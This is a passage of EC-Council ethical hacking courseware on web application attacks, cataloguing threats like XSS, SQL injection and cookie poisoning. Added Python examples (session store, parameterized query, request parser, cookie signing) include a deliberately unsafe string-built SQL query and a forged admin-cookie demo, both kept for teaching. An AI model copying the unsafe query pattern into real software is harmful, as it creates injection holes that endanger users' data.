Hacking Web Applications
Module 13
Exam 312-50 Certified Ethical Hacker
Ethical Hacking and Countermeasures v8
Module 13: Hacking Web Applications
Engineered by Hackers. Presented by Professionals.
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 13 Page 1724
Security News
XSS Attacks Lead Pack As Most Frequent Attack Type
Source: http://www.darkreading.com
Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.
Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).
One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose
69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.
Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge.
The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others. A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.
"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."
The Superfecta attack traffic for Q3 2012 can be broken down as follows:
As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%), to become the second most likely origin of malicious traffic.
Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last:
During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter.
Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of
confidential data at risk, including customer's financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."
Copyright © 2013 UBM Tech, All rights reserved
http://www.darkreading.com/security/news/240009508/firehost-q3-web-application-report-xss-attacks-lead-pack-as-most-frequent-attack-type.html
Module Objectives
- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing
The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help the network administrator to monitor and manage the web application are described. Finally, web application pen testing is discussed.
This module familiarizes you with:
- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Web Servers
- Analyze Web Applications
- Attack Authentication Mechanism
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing
Module Flow
Web applications are application programs that are accessed over an Internet connection. They use HTTP as their primary communication protocol. Attackers generally target these applications for several reasons, and the applications are exposed to various attacks. For a clear understanding of hacking web applications, we have divided the topic into the following sections:
- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing
Let us begin with the Web App concepts.
Web App Concepts
This section introduces you to the web application and its components, explains how the web application works, and describes its architecture. It provides insight into Web 2.0 applications, the vulnerability stack, and web attack vectors.
Web Application Security Statistics
Source: https://www.whitehatsec.com
According to the WhiteHat Security website statistics report in 2012, it is clear that cross-site scripting vulnerabilities are found on more web applications than any other class of vulnerability. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities were the most common vulnerabilities, found in 55% of web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012 (chart residue; vulnerability classes shown: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration; x-axis: year, from 2010)
Introduction to Web Applications
- Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
- Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser
- New web technologies such as Web 2.0 provide more attack surface for web application exploitation
- Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
Web applications are applications that run on a remote web server and deliver their output over the Internet. Web 2.0 technologies are used by server-based applications for functions such as communication with users, clients, third-party users, etc.
A web application is comprised of many layers of functionality. However, it is generally considered a three-layered architecture consisting of presentation, logic, and data layers.
The web architecture relies substantially on the technology popularized by the World Wide Web, Hypertext Markup Language (HTML), and the primary transport medium, i.e. Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically, it operates over TCP port 80, but it may also communicate over any other unused port.
Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.
Some of the popular web servers present today are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources are named by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, i.e., the protocol does not maintain a session state,
the requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client.
Cookies can be used as tokens, which servers hand over to clients to allow access to websites. However, cookies are not perfect from a security point of view, because they can be copied and are stored on the client's local hard disk so that users do not have to request a token for each query. Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation.
Attackers discover vulnerabilities of different types in web applications and exploit them to compromise the applications. Attackers also use tools to launch attacks on web applications.
Web Application Components
The components of web applications are listed as follows:
Login: Most websites allow authenticated users to access the application by means of a login. To access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com
The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.
Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.
User Permissions: When a logged-in user's permissions do not allow access to a requested web page, the application may redirect the user back to the login page or to another page.
The Application Content: It is an interactive program that accepts web requests from clients and uses the parameters sent by the web browser to carry out certain functions.
Data Access: Usually the web pages reach the database through a data access library in which all the database connection details are stored.
The Data Store: It holds the important data that is shared and synchronized between child processes/threads. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network; they can be in contact with, or accessible to, each other through the network connection.
Role-level System Security
Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and services it accordingly. The services offered by the application logic include querying the database and writing the latest updates to it, as well as generating a user interface.
Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either on the initiative of the application logic or automatically when the servlet session times out.
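The cookie-as-token idea from the introduction (HTTP is stateless, so the server hands the client a token), the Session Tracking Mechanism component, and the Logout component above all come together in a minimal server-side session store. The following Python code is an added example written for this page, not code from the EC-Council courseware: the cookie carries only an opaque random identifier, the session data stays on the server, the Set-Cookie value is marked HttpOnly, Secure and SameSite=Lax, and lookups enforce the idle timeout the Logout paragraph mentions. The class name SessionStore, the cookie name sid, the TTL value and the injectable clock are all my own choices.

```python
import secrets
import time
from http.cookies import SimpleCookie, CookieError

SESSION_TTL_SECONDS = 1800  # constructed value for this example (30 minutes)


class SessionStore:
    """In-memory session store mapping an opaque token to user data and expiry.

    Because HTTP is stateless, the token in the cookie is the only link between
    successive requests. Keeping the data server-side means the cookie itself
    carries nothing but a random identifier, so copying the cookie file reveals
    no user data (it still reveals the token, hence the short TTL and logout).
    """

    def __init__(self, ttl=SESSION_TTL_SECONDS, clock=time.time):
        self.ttl = ttl
        self.clock = clock          # injectable so expiry can be tested deterministically
        self._sessions = {}         # token -> {"user": ..., "expires": ...}

    def issue(self, username):
        """Login: create a session and return (token, Set-Cookie header value)."""
        token = secrets.token_urlsafe(32)     # 256 bits from the OS CSPRNG, not guessable
        self._sessions[token] = {"user": username, "expires": self.clock() + self.ttl}
        cookie = SimpleCookie()
        cookie["sid"] = token
        morsel = cookie["sid"]
        morsel["path"] = "/"
        morsel["httponly"] = True             # page scripts cannot read it (limits XSS cookie theft)
        morsel["secure"] = True               # browser only sends it over HTTPS
        morsel["samesite"] = "Lax"            # not attached to most cross-site requests (CSRF)
        return token, morsel.OutputString()

    def validate(self, cookie_header):
        """Session tracking: return the username for a valid, unexpired cookie, else None."""
        cookie = SimpleCookie()
        try:
            cookie.load(cookie_header or "")
        except CookieError:
            return None
        morsel = cookie.get("sid")
        if morsel is None:
            return None
        data = self._sessions.get(morsel.value)
        if data is None:
            return None
        if data["expires"] <= self.clock():   # idle timeout: drop the session, force re-login
            del self._sessions[morsel.value]
            return None
        return data["user"]

    def revoke(self, token):
        """Logout: invalidate the token server-side; returns True if it existed."""
        return self._sessions.pop(token, None) is not None


if __name__ == "__main__":
    store = SessionStore()
    tok, header = store.issue("alice")
    print("Set-Cookie:", header)
    print("validated as:", store.validate("sid=" + tok))
    store.revoke(tok)
    print("after logout:", store.validate("sid=" + tok))
```

The point of revoking server-side is that a logout actually ends the session: if the token only expired in the browser, a copy taken from the client's disk would keep working until the TTL ran out.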
How Web Applications Work
Query: SELECT * from news where id = 6329
Output:
ID    Topic   News
6329  Tech    CNN
Whenever someone clicks a link or types an address in the browser, the requested website or content is displayed on the screen almost immediately, but what is the mechanism behind this? The following is the step-by-step process that takes place once a user sends a request for particular content or a website, with multiple computers involved.
The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains the dynamic content generation technology, such as JSP (JavaServer Pages) and Java servlets or ASP (Active Server Pages), and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.
Let's see how the user triggers the initial request through the browser to the web application server:
1. First the user types the website name or URL in the browser and the request is sent to the web server.
2. On receiving the request, the web server checks the file extension:
   - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
   - If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server.
3. The user's request is now processed by the web application server. In order to process the user's request, the web application server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored in the database. Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.
FIGURE 13.2: Working of Web Application (diagram residue; components shown: User, Login Form, Internet, Firewall, Web Server)
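The three-layer flow just described, ending in the slide's query "SELECT * from news where id = 6329", is easiest to see in code. The Python below is an added example for this page, not code from the courseware: an in-memory SQLite table with the slide's sample row (constructed data), a presentation-layer check on the id parameter, a data-layer lookup that binds the id as a parameter, and the application-logic step that turns the row into a response. The string-built query in build_query_unsafe is shown only to make the contrast visible; the function names and the second sample row are my own.

```python
import sqlite3


def make_db():
    """Data layer: a constructed in-memory table matching the slide's sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, topic TEXT, news TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(6329, "Tech", "CNN"), (6330, "Sports", "ESPN")],  # constructed sample data
    )
    conn.commit()
    return conn


def build_query_unsafe(id_text):
    """Pattern to avoid: the request parameter is spliced straight into the SQL text,
    so whatever the browser sent becomes part of the statement the database runs."""
    return f"SELECT * from news where id = {id_text}"


def parse_news_id(id_text):
    """Presentation layer: validate the parameter before it reaches the data layer."""
    if not id_text.isdigit():
        raise ValueError("id must be a decimal integer")
    return int(id_text)


def fetch_news(conn, id_text):
    """Data layer: a parameterized query; the id is bound as a value, never as SQL."""
    try:
        news_id = parse_news_id(id_text)
    except ValueError:
        return None
    cur = conn.execute("SELECT id, topic, news FROM news WHERE id = ?", (news_id,))
    return cur.fetchone()


def handle_request(conn, query_params):
    """Application logic: map the HTTP query parameter to a (status, body) response."""
    row = fetch_news(conn, query_params.get("id", ""))
    if row is None:
        return 404, "No such article"
    return 200, {"ID": row[0], "Topic": row[1], "News": row[2]}


if __name__ == "__main__":
    db = make_db()
    print(build_query_unsafe("6329"))          # the slide's query, built the fragile way
    print(handle_request(db, {"id": "6329"}))  # (200, {'ID': 6329, 'Topic': 'Tech', 'News': 'CNN'})
    print(handle_request(db, {"id": "6329 x"}))  # rejected before the database sees it
```

With the parameterized form the database driver transmits the id as data, so the text of the statement is fixed at development time regardless of what arrives in the request; the isdigit check is a second, independent layer that also gives the application a clean 404 path for malformed input.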
Web Application Architecture
All web applications execute with the help of the web browser as a supporting client. Web applications use a combination of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by the client-side script, while the server-side tasks, such as storing and retrieving the required data, are performed by the server-side script.
In the following architecture, clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. Data access is handled by the database layer using cloud services and a database server.
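The presentation layer in the architecture diagram starts with an HTTP Request Parser, the first component that untrusted bytes from the client reach. The following Python is an added example for this page, not courseware code, showing the checks such a parser performs before anything is handed to the servlet container or authentication: it enforces a header-size limit, an allow-list of methods, an origin-form request target, a mandatory Host header for HTTP/1.1, a single unambiguous Content-Length, and truncates the body to the declared length. The limits, the allowed method set, the Request dataclass and the function names are my own choices; the sample requests are constructed.

```python
from dataclasses import dataclass, field

MAX_HEADER_BLOCK = 8192                  # constructed limit; real servers make this configurable
ALLOWED_METHODS = frozenset({"GET", "HEAD", "POST"})
SINGLETON_HEADERS = frozenset({"host", "content-length"})   # may appear at most once


class BadRequest(ValueError):
    """Raised for any request the parser refuses; the server should answer 400."""


@dataclass
class Request:
    method: str
    target: str
    version: str
    headers: dict = field(default_factory=dict)   # lower-cased names -> values
    body: bytes = b""


def parse_request(raw: bytes) -> Request:
    """Parse one HTTP/1.x request from raw bytes, rejecting ambiguous or oversized input."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise BadRequest("incomplete header block")
    if len(head) > MAX_HEADER_BLOCK:
        raise BadRequest("header block too large")
    lines = head.split(b"\r\n")
    try:
        method, target, version = lines[0].decode("ascii").split(" ")
    except (UnicodeDecodeError, ValueError):
        raise BadRequest("malformed request line")
    if method not in ALLOWED_METHODS:
        raise BadRequest(f"method not allowed: {method}")
    if version not in ("HTTP/1.0", "HTTP/1.1"):
        raise BadRequest("unsupported HTTP version")
    if not target.startswith("/"):
        raise BadRequest("request target must be origin-form")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.decode("latin-1").partition(":")
        # No colon, empty name, or whitespace around the name: reject rather than guess.
        if not colon or not name or name != name.strip():
            raise BadRequest("malformed header line")
        key = name.lower()
        if key in headers:
            if key in SINGLETON_HEADERS:
                raise BadRequest(f"duplicate {key} header")   # two lengths = two interpretations
            headers[key] = headers[key] + ", " + value.strip()
        else:
            headers[key] = value.strip()
    if version == "HTTP/1.1" and "host" not in headers:
        raise BadRequest("Host header required")
    if "transfer-encoding" in headers:
        raise BadRequest("chunked transfer coding not supported by this parser")
    length = 0
    if "content-length" in headers:
        if not headers["content-length"].isdigit():
            raise BadRequest("Content-Length must be a decimal integer")
        length = int(headers["content-length"])
    if len(rest) < length:
        raise BadRequest("body shorter than Content-Length")
    return Request(method, target, version, headers, rest[:length])


def request_error(raw: bytes):
    """Return the rejection reason for raw, or None if it parses cleanly."""
    try:
        parse_request(raw)
    except BadRequest as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    sample = b"GET /news?id=6329 HTTP/1.1\r\nHost: example.test\r\nCookie: sid=abc\r\n\r\n"
    print(parse_request(sample))
    print(request_error(b"GET /x HTTP/1.1\r\n\r\n"))
```

Refusing rather than repairing is the design choice worth noticing: a parser that silently picks one of two Content-Length values, or tolerates a space before the colon, can disagree with the proxy or firewall in front of it about where one request ends and the next begins.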
FIGURE 13.3: Web Application Architecture (diagram residue; layers shown, client side first)
- Clients: web browser, external web services, smart phones, web appliances; presentation via Flash, Silverlight, JavaScript
- Presentation Layer: firewall, proxy server/cache, web server (HTTP request parser, servlet container, resource handler, authentication and login)
- Business Layer: application server with business logic (J2EE, .NET, COM; XCode, C++, COM+), legacy application, data access
- Database Layer: cloud services, database server
Web 2.0 Applications
Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:
- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
- Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
Vulnerability Stack
Web applications are maintained and accessed through several layers: custom web applications, third-party components, databases, web servers, operating systems, networks, and security devices. The mechanisms and services employed at each layer help the user in one way or another to access the web application securely. When talking about web applications, security is a critical component to consider because web applications are a major avenue for attacks. The following vulnerability stack shows each layer and the corresponding element, mechanism, or service employed at that layer that can make the web application vulnerable:
Custom Web Applications : Business Logic Flaws, Technical Vulnerabilities
Third Party Components  : Open Source / Commercial
Database                : Oracle / MySQL / MS SQL
Web Server              : Apache / Microsoft IIS
Operating System        : Windows / Linux / OS X
Network                 : Router / Switch
Security                : IPS / IDS

FIGURE 13.4: Vulnerability Stack
Web Attack Vectors

• An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
• Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
• Security controls need to be updated continuously, as the attack vectors keep changing with respect to the target of attack
An attack vector is a path or means by which an attacker enters a system without authorization to carry out a malicious attack. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, because attack vectors keep changing and evolving with new technology.

Examples of attack vectors:

• Parameter manipulation: The attacker supplies crafted input values to a web service and thereby gains control over the SQL, LDAP, XPath, or shell commands that the service builds from them. When a web service accepts such values without validation, it and the web applications that rely on it become easy targets.
• XML poisoning: Attackers submit manipulated XML documents that, when parsed, disrupt the logic of the parsing routine on the server. When very large XML documents are processed at the application layer, the application can be exhausted or compromised, letting the attacker launch further attacks and gather information.
• Client validation: Client-side validation must always be backed by server-side validation. AJAX routines can easily be manipulated, which opens the way for attackers to perform SQL injection, LDAP injection, and similar attacks and to compromise the web application's key resources.
• Server misconfiguration: The attacker exploits weaknesses in the web server's configuration and tries to bypass its validation methods in order to reach confidential data stored on the server.
• Web service routing issues: WS-Routing allows SOAP messages to be routed through different nodes on the Internet. A compromised intermediate node can give the attacker access to the SOAP messages exchanged between the two endpoints.
• Cross-site scripting: Whenever attacker-supplied JavaScript is executed in a targeted browser, the attacker can use that browser to gather information.
Module Flow

Web applications are targeted by attackers for various reasons. The first is that the source code is often of poor quality with respect to security; the second is that applications are frequently deployed with a complex setup. Attackers can easily exploit these loopholes. Now we will discuss the threats associated with web applications.
• Web App Concepts
• Web App Threats
• Hacking Methodology
• Web Application Hacking Tools
• Countermeasures
• Security Tools
• Web App Pen Testing
This section lists and explains the various web application threats, such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Web Application Threats - 1
Web application threats are not limited to attacks on URLs over port 80. Regardless of which ports, protocols, and OSI layers are used, the integrity of mission-critical applications must be protected against future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack.

The various types of web application threats are as follows:
Cookie Poisoning

By modifying the information inside a cookie, attackers bypass the authentication process. Once they gain control, they can modify content, use the system for further malicious attacks, or steal information from the user's system.
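The following is an added example, not code from the original courseware, showing why a cookie that merely carries "role=user" can be poisoned and how signing the cookie defeats the edit. The cookie format, the field names and the secret key are assumptions made for the demo.

```python
import base64
import hashlib
import hmac

# Server-side secret used to sign cookies. Constructed for this example; a real
# deployment loads it from a secrets store and never hard-codes it.
SECRET_KEY = b"demo-secret-do-not-use-in-production"


def parse_cookie(value):
    """Parse 'k1=v1;k2=v2' into a dict."""
    fields = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            fields[key.strip()] = val.strip()
    return fields


def role_from_unsigned_cookie(cookie):
    """Vulnerable: trusts whatever 'role' the client sends back in the cookie."""
    return parse_cookie(cookie).get("role", "user")


def sign_cookie(payload):
    """Append an HMAC-SHA256 tag so that any edit to the payload is detectable."""
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).digest()
    return payload + "|" + base64.urlsafe_b64encode(tag).decode()


def verify_cookie(signed):
    """Return the payload if its tag is valid, or None if the cookie was altered."""
    if "|" not in signed:
        return None
    payload, _, tag_b64 = signed.rpartition("|")
    try:
        sent_tag = base64.urlsafe_b64decode(tag_b64.encode())
    except (ValueError, TypeError):          # malformed base64
        return None
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).digest()
    # Constant-time comparison: a plain == would leak timing information.
    if not hmac.compare_digest(sent_tag, expected):
        return None
    return payload


def role_from_signed_cookie(signed):
    """Hardened: a cookie whose tag does not verify is treated as anonymous."""
    payload = verify_cookie(signed)
    if payload is None:
        return "anonymous"
    return parse_cookie(payload).get("role", "user")


def demo():
    """Poison an unsigned cookie, then try the same edit against a signed one."""
    issued = "user=jason;role=user"                          # set by the server at login
    poisoned = issued.replace("role=user", "role=admin")     # the attacker's edit
    unsigned_result = role_from_unsigned_cookie(poisoned)    # "admin": poisoning works
    signed = sign_cookie(issued)
    intact_result = role_from_signed_cookie(signed)          # "user"
    tampered_result = role_from_signed_cookie(
        signed.replace("role=user", "role=admin"))           # "anonymous": tag no longer matches
    return unsigned_result, intact_result, tampered_result


if __name__ == "__main__":
    print(demo())
```

Signing stops modification, not disclosure or replay: the payload is still readable by whoever holds the cookie, so anything confidential must be encrypted as well, and a stolen signed cookie is still usable until it expires or the session is revoked.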
Directory Traversal

Attackers exploit HTTP through directory traversal to reach restricted directories and execute commands outside of the web server's root directory.
Unvalidated Input

To bypass security checks, attackers tamper with HTTP requests, URLs, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data are stored in cookies, and these become a source of attack for intruders, who gain access to the victim's system using the information present in them. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), and buffer overflows.
Cross-site Scripting (XSS)

An attacker injects malicious scripts into the web pages of a particular website. When these scripts run in a victim's browser they bypass the client's security mechanisms and act with the user's access privileges; they can even rewrite the HTML content of the website.
Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection

This is a type of attack in which SQL commands are injected by the attacker via input data; the attacker can then read or tamper with the data.
Parameter/Form Tampering

This type of attack manipulates the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, or the price and quantity of products. This information is usually carried in cookies, hidden form fields, or URL query strings, and is used to add application functionality and control. A man-in-the-middle position is one way to carry out this attack. Attackers use tools such as WebScarab and Paros Proxy for these attacks.
Denial-of-Service (DoS)

A denial-of-service attack is intended to terminate the operations of a website or a server and make it unavailable to its intended users. For instance, a bank or email service website becomes unable to function for a few hours to a few days, resulting in loss of time and money.
Broken Access Control

Broken access control describes a flaw in an application's access control where authentication or authorization checks can be bypassed, letting the attacker compromise the network.
Cross-site Request Forgery

Cross-site request forgery is an attack in which an authenticated user is made to perform actions on the web application that the attacker chooses, for example by clicking a link sent through email or chat.
Information Leakage

Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.
Improper Error Handling

It is necessary to define how the system or network should behave when an error occurs; otherwise, the error may give the attacker a chance to break into the system. Improper error handling may also lead to DoS attacks.
Log Tampering

Web applications maintain logs to track usage patterns such as user and admin logins. Attackers inject, delete, or tamper with these logs so that they can perform malicious actions or hide their identities.
Buffer Overflow

A buffer overflow vulnerability occurs when a web application fails to guard its buffers properly and allows writing beyond their maximum size.
Broken Session Management

These attacks occur when security-sensitive credentials such as passwords and session tokens are not properly protected. Attackers compromise the credentials through these weaknesses.
Security Misconfiguration

Developers and network administrators should check that the entire stack is configured properly, as security misconfiguration can happen at any level of the application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with automated scanners, and attackers exploit them to compromise web application security.
Broken Account Management

Even valid authentication schemes are weakened by vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.
Insecure Storage

Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If these storage locations are not properly secured, the web application is at risk because attackers can access the storage and misuse the information. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Web Application Threats - 2
Platform Exploits

Various web applications are built on different platforms, such as BEA WebLogic and ColdFusion. Each platform has vulnerabilities and exploits associated with it.
Insecure Direct Object References

An insecure direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory, database record, or key. For example, if a bank account number is used as the primary key and exposed in requests, there is a good chance that an attacker can reach other accounts simply by changing that reference.
Insecure Cryptographic Storage

Sensitive data stored in the database has to be properly encrypted. Encryption methods devised by developers themselves are often not up to par; cryptographically strong, standard methods must be used. At the same time, care must be taken in storing the cryptographic keys: if the keys are kept in insecure places, the attacker can obtain them easily and decrypt the sensitive data.
Authentication Hijacking

Every web application identifies the user with identifiers such as a user ID and password. Once the attacker compromises these, theft of services, session hijacking, and user impersonation can follow.
Network Access Attacks

Network access attacks can have a major impact on web applications. They can affect the basic level of services within an application and allow access that standard HTTP application methods would not have.
Cookie Snooping

Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or they may use it to launch attacks on the victim's web applications.
W e b S e r v ic e s A t t a c k s
W eb services are process-to-process com m unications th a t have special security issues
and needs. An attacker injects a m alicious script into a w eb service and is able to
disclose and m odify application data.
Insufficient Transport Layer Protection

SSL/TLS should be used to protect authentication on websites; otherwise the attacker can monitor network traffic and steal an authenticated user's session cookie. Account theft, phishing attacks, and compromise of admin accounts may follow once systems are compromised.
Hidden Manipulation

These attacks are mostly used to compromise e-commerce websites. Attackers manipulate hidden form fields and change the data stored in them. Several online stores face this problem every day: attackers alter prices and complete transactions at the prices of their choice.
DMZ Protocol Attacks

The DMZ (demilitarized zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who compromises a system in the DMZ that is permitted to speak other DMZ protocols gains access to other DMZ hosts and internal systems. This level of access can lead to:

• Compromise of the web application and data
• Defacement of websites
• Access to internal systems, including databases, backups, and source code
Unvalidated Redirects and Forwards

Attackers make a victim click an unvalidated link that appears to lead to a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to:

• Session fixation attacks
• Security management exploits
• Failure to restrict URL access
• Malicious file execution
Failure to Restrict URL Access

An application often protects sensitive functionality only by not displaying the links or URLs that lead to it. Attackers request those URLs directly and perform illegitimate operations.
Obfuscation Application

Attackers usually work hard at hiding their attacks to avoid detection. Network and host intrusion detection systems (IDSs) constantly look for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation is encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so that they display properly regardless of the application or underlying platform in which they are used.
Security Management Exploits

Some attackers target security management systems, either on networks or at the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
Session Fixation Attack

